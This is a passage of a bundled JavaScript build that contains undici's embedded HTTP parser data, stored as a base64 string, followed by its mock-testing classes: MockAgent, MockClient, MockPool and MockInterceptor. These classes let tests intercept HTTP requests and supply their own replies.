1VOX0VSUk9SAElERU5USVRZX1BST1ZJREVSX0FVVEhFTlRJQ0FUSU9OX0VSUk9SAFNTTF9DRVJUSUZJQ0FURV9FUlJPUgBJTlZBTElEX1hfRk9SV0FSREVEX0ZPUgBTRVRfUEFSQU1FVEVSAEdFVF9QQVJBTUVURVIASFBFX1VTRVIAU0VFX09USEVSAEhQRV9DQl9DSFVOS19IRUFERVIATUtDQUxFTkRBUgBTRVRVUABXRUJfU0VSVkVSX0lTX0RPV04AVEVBUkRPV04ASFBFX0NMT1NFRF9DT05ORUNUSU9OAEhFVVJJU1RJQ19FWFBJUkFUSU9OAERJU0NPTk5FQ1RFRF9PUEVSQVRJT04ATk9OX0FVVEhPUklUQVRJVkVfSU5GT1JNQVRJT04ASFBFX0lOVkFMSURfVkVSU0lPTgBIUEVfQ0JfTUVTU0FHRV9CRUdJTgBTSVRFX0lTX0ZST1pFTgBIUEVfSU5WQUxJRF9IRUFERVJfVE9LRU4ASU5WQUxJRF9UT0tFTgBGT1JCSURERU4ARU5IQU5DRV9ZT1VSX0NBTE0ASFBFX0lOVkFMSURfVVJMAEJMT0NLRURfQllfUEFSRU5UQUxfQ09OVFJPTABNS0NPTABBQ0wASFBFX0lOVEVSTkFMAFJFUVVFU1RfSEVBREVSX0ZJRUxEU19UT09fTEFSR0VfVU5PRkZJQ0lBTABIUEVfT0sAVU5MSU5LAFVOTE9DSwBQUkkAUkVUUllfV0lUSABIUEVfSU5WQUxJRF9DT05URU5UX0xFTkdUSABIUEVfVU5FWFBFQ1RFRF9DT05URU5UX0xFTkdUSABGTFVTSABQUk9QUEFUQ0gATS1TRUFSQ0gAVVJJX1RPT19MT05HAFBST0NFU1NJTkcATUlTQ0VMTEFORU9VU19QRVJTSVNURU5UX1dBUk5JTkcATUlTQ0VMTEFORU9VU19XQVJOSU5HAEhQRV9JTlZBTElEX1RSQU5TRkVSX0VOQ09ESU5HAEV4cGVjdGVkIENSTEYASFBFX0lOVkFMSURfQ0hVTktfU0laRQBNT1ZFAENPTlRJTlVFAEhQRV9DQl9TVEFUVVNfQ09NUExFVEUASFBFX0NCX0hFQURFUlNfQ09NUExFVEUASFBFX0NCX1ZFUlNJT05fQ09NUExFVEUASFBFX0NCX1VSTF9DT01QTEVURQBIUEVfQ0JfQ0hVTktfQ09NUExFVEUASFBFX0NCX0hFQURFUl9WQUxVRV9DT01QTEVURQBIUEVfQ0JfQ0hVTktfRVhURU5TSU9OX1ZBTFVFX0NPTVBMRVRFAEhQRV9DQl9DSFVOS19FWFRFTlNJT05fTkFNRV9DT01QTEVURQBIUEVfQ0JfTUVTU0FHRV9DT01QTEVURQBIUEVfQ0JfTUVUSE9EX0NPTVBMRVRFAEhQRV9DQl9IRUFERVJfRklFTERfQ09NUExFVEUAREVMRVRFAEhQRV9JTlZBTElEX0VPRl9TVEFURQBJTlZBTElEX1NTTF9DRVJUSUZJQ0FURQBQQVVTRQBOT19SRVNQT05TRQBVTlNVUFBPUlRFRF9NRURJQV9UWVBFAEdPTkUATk9UX0FDQ0VQVEFCTEUAU0VSVklDRV9VTkFWQUlMQUJMRQBSQU5HRV9OT1RfU0FUSVNGSUFCTEUAT1JJR0lOX0lTX1VOUkVBQ0hBQkxFAFJFU1BPTlNFX0lTX1NUQUxFAFBVUkdFAE1FUkdFAFJFUVVFU1RfSEVBREVSX0ZJRUxEU19UT09fTEFSR0UAUkVRVUVTVF9IRUFERVJfVE9PX0xBUkdFAFBBWUxPQURfVE9PX0xBUkdFAElOU1VGRklDSUVOVF9TVE9SQUdFAEhQRV9QQVVTRURfVVBHUkFERQBIUEVfUEFVU0VEX0gyX1VQR1JBREUAU09VUkNFAEFOTk9VTkNFAFRSQUNFAEhQRV9VTkVYUEVDVEVEX1NQQUNFAERFU0NSSUJFAFVOU1VCU0NSSUJFAFJFQ09SRABIUEVfSU5WQUxJRF9NRVRIT0QATk9UX0ZPVU5EAFBST1BGSU5EAFVOQklORABSRUJJTkQAVU5BVVRIT1JJWkVEAE1FVEhPRF9OT1RfQUxMT1dFRABIVFRQX1ZFUlNJT05fTk9UX1NVUFBPUlRFRABBTFJFQURZX1JFUE9SVEVEAEFDQ0VQVEVEAE5PVF9JTVBMRU1FTlRFRABMT09QX0RFVEVDVEVEAEhQRV9DUl9FWFBFQ1RFRABIUEVfTEZfRVhQRUNURUQAQ1JFQVRFRABJTV9VU0VEAEhQRV9QQVVTRUQAVElNRU9VVF9PQ0NVUkVEAFBBWU1FTlRfUkVRVUlSRUQAUFJFQ09ORElUSU9OX1JFUVVJUkVEAFBST1hZX0FVVEhFTlRJQ0FUSU9OX1JFUVVJUkVEAE5FVFdPUktfQVVUSEVOVElDQVRJT05fUkVRVUlSRUQATEVOR1RIX1JFUVVJUkVEAFNTTF9DRVJUSUZJQ0FURV9SRVFVSVJFRABVUEdSQURFX1JFUVVJUkVEAFBBR0VfRVhQSVJFRABQUkVDT05ESVRJT05fRkFJTEVEAEVYUEVDVEFUSU9OX0ZBSUxFRABSRVZBTElEQVRJT05fRkFJTEVEAFNTTF9IQU5EU0hBS0VfRkFJTEVEAExPQ0tFRABUUkFOU0ZPUk1BVElPTl9BUFBMSUVEAE5PVF9NT0RJRklFRABOT1RfRVhURU5ERUQAQkFORFdJRFRIX0xJTUlUX0VYQ0VFREVEAFNJVEVfSVNfT1ZFUkxPQURFRABIRUFEAEV4cGVjdGVkIEhUVFAvAABeEwAAJhMAADAQAADwFwAAnRMAABUSAAA5FwAA8BIAAAoQAAB1EgAArRIAAIITAABPFAAAfxAAAKAVAAAjFAAAiRIAAIsUAABNFQAA1BEAAM8UAAAQGAAAyRYAANwWAADBEQAA4BcAALsUAAB0FAAAfBUAAOUUAAAIFwAAHxAAAGUVAACjFAAAKBUAAAIVAACZFQAALBAAAIsZAABPDwAA1A4AAGoQAADOEAAAAhcAAIkOAABuEwAAHBMAAGYUAABWFwAAwRMAAM0TAABsEwAAaBcAAGYXAABfFwAAIhMAAM4PAABpDgAA2A4AAGMWAADLEwAAqg4AACgXAAAmFwAAxRMAAF0WAADoEQAAZxMAAGUTAADyFgAAcxMAAB0XAAD5FgAA8xEAAM8OAADOFQAADBIAALMRAAClEQAAYRAAADIXAAC7EwAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEBAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAgMCAgICAgAAAgIAAgIAAgICAgICAgICAgAEAAAAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAgICAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgICAgIAAAICAAICAAICAgICAgICAgIAAwAEAAAAAgICAgICAgICAgICAgICAgICAgICAgICAgIAAAACAgICAgICAgICAgICAgICAgICAgICAgICAgICAgACAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABsb3NlZWVwLWFsaXZlAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQEBAQEBAQEBAQEBAgEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQFjaHVua2VkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQABAQEBAQAAAQEAAQEAAQEBAQEBAQEBAQAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGVjdGlvbmVudC1sZW5ndGhvbnJveHktY29ubmVjdGlvbgAAAAAAAAAAAAAAAAAAAHJhbnNmZXItZW5jb2RpbmdwZ3JhZGUNCg0KDQpTTQ0KDQpUVFAvQ0UvVFNQLwAAAAAAAAAAAAAAAAECAAEDAAAAAAAAAAAAAAAAAAAAAAAABAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAAAAAAAAAAABAgABAwAAAAAAAAAAAAAAAAAAAAAAAAQBAQUBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAQEAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAAAAAABAAACAAAAAAAAAAAAAAAAAAAAAAAAAwQAAAQEBAQEBAQEBAQEBQQEBAQEBAQEBAQEBAAEAAYHBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEAAQABAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAgAAAAACAAAAAAAAAAAAAAAAAAAAAAADAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwAAAAAAAAMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAE5PVU5DRUVDS09VVE5FQ1RFVEVDUklCRUxVU0hFVEVBRFNFQVJDSFJHRUNUSVZJVFlMRU5EQVJWRU9USUZZUFRJT05TQ0hTRUFZU1RBVENIR0VPUkRJUkVDVE9SVFJDSFBBUkFNRVRFUlVSQ0VCU0NSSUJFQVJET1dOQUNFSU5ETktDS1VCU0NSSUJFSFRUUC9BRFRQLw==' - - -/***/ }), - -/***/ 1891: -/***/ ((__unused_webpack_module, exports) => { - -"use strict"; - -Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.enumToMap = void 0; -function enumToMap(obj) { - const res = {}; - Object.keys(obj).forEach((key) => { - const value = obj[key]; - if (typeof value === 'number') { - res[key] = value; - } - }); - return res; -} -exports.enumToMap = enumToMap; -//# sourceMappingURL=utils.js.map - -/***/ }), - -/***/ 6771: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kClients } = __nccwpck_require__(2785) -const Agent = __nccwpck_require__(7890) -const { - kAgent, - kMockAgentSet, - kMockAgentGet, - kDispatches, - kIsMockActive, - kNetConnect, - kGetNetConnect, - kOptions, - kFactory -} = __nccwpck_require__(4347) -const MockClient = __nccwpck_require__(8687) -const MockPool = __nccwpck_require__(6193) -const { matchValue, buildMockOptions } = __nccwpck_require__(9323) -const { InvalidArgumentError, UndiciError } = __nccwpck_require__(8045) -const Dispatcher = __nccwpck_require__(412) -const Pluralizer = __nccwpck_require__(8891) -const PendingInterceptorsFormatter = __nccwpck_require__(6823) - -class FakeWeakRef { - constructor (value) { - this.value = value - } - - deref () { - return this.value - } -} - -class MockAgent extends Dispatcher { - constructor (opts) { - super(opts) - - this[kNetConnect] = true - this[kIsMockActive] = true - - // Instantiate Agent and encapsulate - if ((opts && opts.agent && typeof opts.agent.dispatch !== 'function')) { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - const agent = opts && opts.agent ? opts.agent : new Agent(opts) - this[kAgent] = agent - - this[kClients] = agent[kClients] - this[kOptions] = buildMockOptions(opts) - } - - get (origin) { - let dispatcher = this[kMockAgentGet](origin) - - if (!dispatcher) { - dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - } - return dispatcher - } - - dispatch (opts, handler) { - // Call MockAgent.get to perform additional setup before dispatching as normal - this.get(opts.origin) - return this[kAgent].dispatch(opts, handler) - } - - async close () { - await this[kAgent].close() - this[kClients].clear() - } - - deactivate () { - this[kIsMockActive] = false - } - - activate () { - this[kIsMockActive] = true - } - - enableNetConnect (matcher) { - if (typeof matcher === 'string' || typeof matcher === 'function' || matcher instanceof RegExp) { - if (Array.isArray(this[kNetConnect])) { - this[kNetConnect].push(matcher) - } else { - this[kNetConnect] = [matcher] - } - } else if (typeof matcher === 'undefined') { - this[kNetConnect] = true - } else { - throw new InvalidArgumentError('Unsupported matcher. Must be one of String|Function|RegExp.') - } - } - - disableNetConnect () { - this[kNetConnect] = false - } - - // This is required to bypass issues caused by using global symbols - see: - // https://github.com/nodejs/undici/issues/1447 - get isMockActive () { - return this[kIsMockActive] - } - - [kMockAgentSet] (origin, dispatcher) { - this[kClients].set(origin, new FakeWeakRef(dispatcher)) - } - - [kFactory] (origin) { - const mockOptions = Object.assign({ agent: this }, this[kOptions]) - return this[kOptions] && this[kOptions].connections === 1 - ? new MockClient(origin, mockOptions) - : new MockPool(origin, mockOptions) - } - - [kMockAgentGet] (origin) { - // First check if we can immediately find it - const ref = this[kClients].get(origin) - if (ref) { - return ref.deref() - } - - // If the origin is not a string create a dummy parent pool and return to user - if (typeof origin !== 'string') { - const dispatcher = this[kFactory]('http://localhost:9999') - this[kMockAgentSet](origin, dispatcher) - return dispatcher - } - - // If we match, create a pool and assign the same dispatches - for (const [keyMatcher, nonExplicitRef] of Array.from(this[kClients])) { - const nonExplicitDispatcher = nonExplicitRef.deref() - if (nonExplicitDispatcher && typeof keyMatcher !== 'string' && matchValue(keyMatcher, origin)) { - const dispatcher = this[kFactory](origin) - this[kMockAgentSet](origin, dispatcher) - dispatcher[kDispatches] = nonExplicitDispatcher[kDispatches] - return dispatcher - } - } - } - - [kGetNetConnect] () { - return this[kNetConnect] - } - - pendingInterceptors () { - const mockAgentClients = this[kClients] - - return Array.from(mockAgentClients.entries()) - .flatMap(([origin, scope]) => scope.deref()[kDispatches].map(dispatch => ({ ...dispatch, origin }))) - .filter(({ pending }) => pending) - } - - assertNoPendingInterceptors ({ pendingInterceptorsFormatter = new PendingInterceptorsFormatter() } = {}) { - const pending = this.pendingInterceptors() - - if (pending.length === 0) { - return - } - - const pluralizer = new Pluralizer('interceptor', 'interceptors').pluralize(pending.length) - - throw new UndiciError(` -${pluralizer.count} ${pluralizer.noun} ${pluralizer.is} pending: - -${pendingInterceptorsFormatter.format(pending)} -`.trim()) - } -} - -module.exports = MockAgent - - -/***/ }), - -/***/ 8687: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Client = __nccwpck_require__(3598) -const { buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockClient provides an API that extends the Client to influence the mockDispatches. - */ -class MockClient extends Client { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. - */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockClient - - -/***/ }), - -/***/ 888: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { UndiciError } = __nccwpck_require__(8045) - -class MockNotMatchedError extends UndiciError { - constructor (message) { - super(message) - Error.captureStackTrace(this, MockNotMatchedError) - this.name = 'MockNotMatchedError' - this.message = message || 'The request does not match any registered mock dispatches' - this.code = 'UND_MOCK_ERR_MOCK_NOT_MATCHED' - } -} - -module.exports = { - MockNotMatchedError -} - - -/***/ }), - -/***/ 410: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { getResponseData, buildKey, addMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kDispatchKey, - kDefaultHeaders, - kDefaultTrailers, - kContentLength, - kMockDispatch -} = __nccwpck_require__(4347) -const { InvalidArgumentError } = __nccwpck_require__(8045) -const { buildURL } = __nccwpck_require__(3983) - -/** - * Defines the scope API for an interceptor reply - */ -class MockScope { - constructor (mockDispatch) { - this[kMockDispatch] = mockDispatch - } - - /** - * Delay a reply by a set amount in ms. - */ - delay (waitInMs) { - if (typeof waitInMs !== 'number' || !Number.isInteger(waitInMs) || waitInMs <= 0) { - throw new InvalidArgumentError('waitInMs must be a valid integer > 0') - } - - this[kMockDispatch].delay = waitInMs - return this - } - - /** - * For a defined reply, never mark as consumed. - */ - persist () { - this[kMockDispatch].persist = true - return this - } - - /** - * Allow one to define a reply for a set amount of matching requests. - */ - times (repeatTimes) { - if (typeof repeatTimes !== 'number' || !Number.isInteger(repeatTimes) || repeatTimes <= 0) { - throw new InvalidArgumentError('repeatTimes must be a valid integer > 0') - } - - this[kMockDispatch].times = repeatTimes - return this - } -} - -/** - * Defines an interceptor for a Mock - */ -class MockInterceptor { - constructor (opts, mockDispatches) { - if (typeof opts !== 'object') { - throw new InvalidArgumentError('opts must be an object') - } - if (typeof opts.path === 'undefined') { - throw new InvalidArgumentError('opts.path must be defined') - } - if (typeof opts.method === 'undefined') { - opts.method = 'GET' - } - // See https://github.com/nodejs/undici/issues/1245 - // As per RFC 3986, clients are not supposed to send URI - // fragments to servers when they retrieve a document, - if (typeof opts.path === 'string') { - if (opts.query) { - opts.path = buildURL(opts.path, opts.query) - } else { - // Matches https://github.com/nodejs/undici/blob/main/lib/fetch/index.js#L1811 - const parsedURL = new URL(opts.path, 'data://') - opts.path = parsedURL.pathname + parsedURL.search - } - } - if (typeof opts.method === 'string') { - opts.method = opts.method.toUpperCase() - } - - this[kDispatchKey] = buildKey(opts) - this[kDispatches] = mockDispatches - this[kDefaultHeaders] = {} - this[kDefaultTrailers] = {} - this[kContentLength] = false - } - - createMockScopeDispatchData (statusCode, data, responseOptions = {}) { - const responseData = getResponseData(data) - const contentLength = this[kContentLength] ? { 'content-length': responseData.length } : {} - const headers = { ...this[kDefaultHeaders], ...contentLength, ...responseOptions.headers } - const trailers = { ...this[kDefaultTrailers], ...responseOptions.trailers } - - return { statusCode, data, headers, trailers } - } - - validateReplyParameters (statusCode, data, responseOptions) { - if (typeof statusCode === 'undefined') { - throw new InvalidArgumentError('statusCode must be defined') - } - if (typeof data === 'undefined') { - throw new InvalidArgumentError('data must be defined') - } - if (typeof responseOptions !== 'object') { - throw new InvalidArgumentError('responseOptions must be an object') - } - } - - /** - * Mock an undici request with a defined reply. - */ - reply (replyData) { - // Values of reply aren't available right now as they - // can only be available when the reply callback is invoked. - if (typeof replyData === 'function') { - // We'll first wrap the provided callback in another function, - // this function will properly resolve the data from the callback - // when invoked. - const wrappedDefaultsCallback = (opts) => { - // Our reply options callback contains the parameter for statusCode, data and options. - const resolvedData = replyData(opts) - - // Check if it is in the right format - if (typeof resolvedData !== 'object') { - throw new InvalidArgumentError('reply options callback must return an object') - } - - const { statusCode, data = '', responseOptions = {} } = resolvedData - this.validateReplyParameters(statusCode, data, responseOptions) - // Since the values can be obtained immediately we return them - // from this higher order function that will be resolved later. - return { - ...this.createMockScopeDispatchData(statusCode, data, responseOptions) - } - } - - // Add usual dispatch data, but this time set the data parameter to function that will eventually provide data. - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], wrappedDefaultsCallback) - return new MockScope(newMockDispatch) - } - - // We can have either one or three parameters, if we get here, - // we should have 1-3 parameters. So we spread the arguments of - // this function to obtain the parameters, since replyData will always - // just be the statusCode. - const [statusCode, data = '', responseOptions = {}] = [...arguments] - this.validateReplyParameters(statusCode, data, responseOptions) - - // Send in-already provided data like usual - const dispatchData = this.createMockScopeDispatchData(statusCode, data, responseOptions) - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], dispatchData) - return new MockScope(newMockDispatch) - } - - /** - * Mock an undici request with a defined error. - */ - replyWithError (error) { - if (typeof error === 'undefined') { - throw new InvalidArgumentError('error must be defined') - } - - const newMockDispatch = addMockDispatch(this[kDispatches], this[kDispatchKey], { error }) - return new MockScope(newMockDispatch) - } - - /** - * Set default reply headers on the interceptor for subsequent replies - */ - defaultReplyHeaders (headers) { - if (typeof headers === 'undefined') { - throw new InvalidArgumentError('headers must be defined') - } - - this[kDefaultHeaders] = headers - return this - } - - /** - * Set default reply trailers on the interceptor for subsequent replies - */ - defaultReplyTrailers (trailers) { - if (typeof trailers === 'undefined') { - throw new InvalidArgumentError('trailers must be defined') - } - - this[kDefaultTrailers] = trailers - return this - } - - /** - * Set reply content length header for replies on the interceptor - */ - replyContentLength () { - this[kContentLength] = true - return this - } -} - -module.exports.MockInterceptor = MockInterceptor -module.exports.MockScope = MockScope - - -/***/ }), - -/***/ 6193: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { promisify } = __nccwpck_require__(3837) -const Pool = __nccwpck_require__(4634) -const { buildMockDispatch } = __nccwpck_require__(9323) -const { - kDispatches, - kMockAgent, - kClose, - kOriginalClose, - kOrigin, - kOriginalDispatch, - kConnected -} = __nccwpck_require__(4347) -const { MockInterceptor } = __nccwpck_require__(410) -const Symbols = __nccwpck_require__(2785) -const { InvalidArgumentError } = __nccwpck_require__(8045) - -/** - * MockPool provides an API that extends the Pool to influence the mockDispatches. - */ -class MockPool extends Pool { - constructor (origin, opts) { - super(origin, opts) - - if (!opts || !opts.agent || typeof opts.agent.dispatch !== 'function') { - throw new InvalidArgumentError('Argument opts.agent must implement Agent') - } - - this[kMockAgent] = opts.agent - this[kOrigin] = origin - this[kDispatches] = [] - this[kConnected] = 1 - this[kOriginalDispatch] = this.dispatch - this[kOriginalClose] = this.close.bind(this) - - this.dispatch = buildMockDispatch.call(this) - this.close = this[kClose] - } - - get [Symbols.kConnected] () { - return this[kConnected] - } - - /** - * Sets up the base interceptor for mocking replies from undici. - */ - intercept (opts) { - return new MockInterceptor(opts, this[kDispatches]) - } - - async [kClose] () { - await promisify(this[kOriginalClose])() - this[kConnected] = 0 - this[kMockAgent][Symbols.kClients].delete(this[kOrigin]) - } -} - -module.exports = MockPool - - -/***/ }), - -/***/ 4347: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kAgent: Symbol('agent'), - kOptions: Symbol('options'), - kFactory: Symbol('factory'), - kDispatches: Symbol('dispatches'), - kDispatchKey: Symbol('dispatch key'), - kDefaultHeaders: Symbol('default headers'), - kDefaultTrailers: Symbol('default trailers'), - kContentLength: Symbol('content length'), - kMockAgent: Symbol('mock agent'), - kMockAgentSet: Symbol('mock agent set'), - kMockAgentGet: Symbol('mock agent get'), - kMockDispatch: Symbol('mock dispatch'), - kClose: Symbol('close'), - kOriginalClose: Symbol('original agent close'), - kOrigin: Symbol('origin'), - kIsMockActive: Symbol('is mock active'), - kNetConnect: Symbol('net connect'), - kGetNetConnect: Symbol('get net connect'), - kConnected: Symbol('connected') -} - - -/***/ }), - -/***/ 9323: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { MockNotMatchedError } = __nccwpck_require__(888) -const { - kDispatches, - kMockAgent, - kOriginalDispatch, - kOrigin, - kGetNetConnect -} = __nccwpck_require__(4347) -const { buildURL, nop } = __nccwpck_require__(3983) -const { STATUS_CODES } = __nccwpck_require__(3685) -const { - types: { - isPromise - } -} = __nccwpck_require__(3837) - -function matchValue (match, value) { - if (typeof match === 'string') { - return match === value - } - if (match instanceof RegExp) { - return match.test(value) - } - if (typeof match === 'function') { - return match(value) === true - } - return false -} - -function lowerCaseEntries (headers) { - return Object.fromEntries( - Object.entries(headers).map(([headerName, headerValue]) => { - return [headerName.toLocaleLowerCase(), headerValue] - }) - ) -} - -/** - * @param {import('../../index').Headers|string[]|Record} headers - * @param {string} key - */ -function getHeaderByName (headers, key) { - if (Array.isArray(headers)) { - for (let i = 0; i < headers.length; i += 2) { - if (headers[i].toLocaleLowerCase() === key.toLocaleLowerCase()) { - return headers[i + 1] - } - } - - return undefined - } else if (typeof headers.get === 'function') { - return headers.get(key) - } else { - return lowerCaseEntries(headers)[key.toLocaleLowerCase()] - } -} - -/** @param {string[]} headers */ 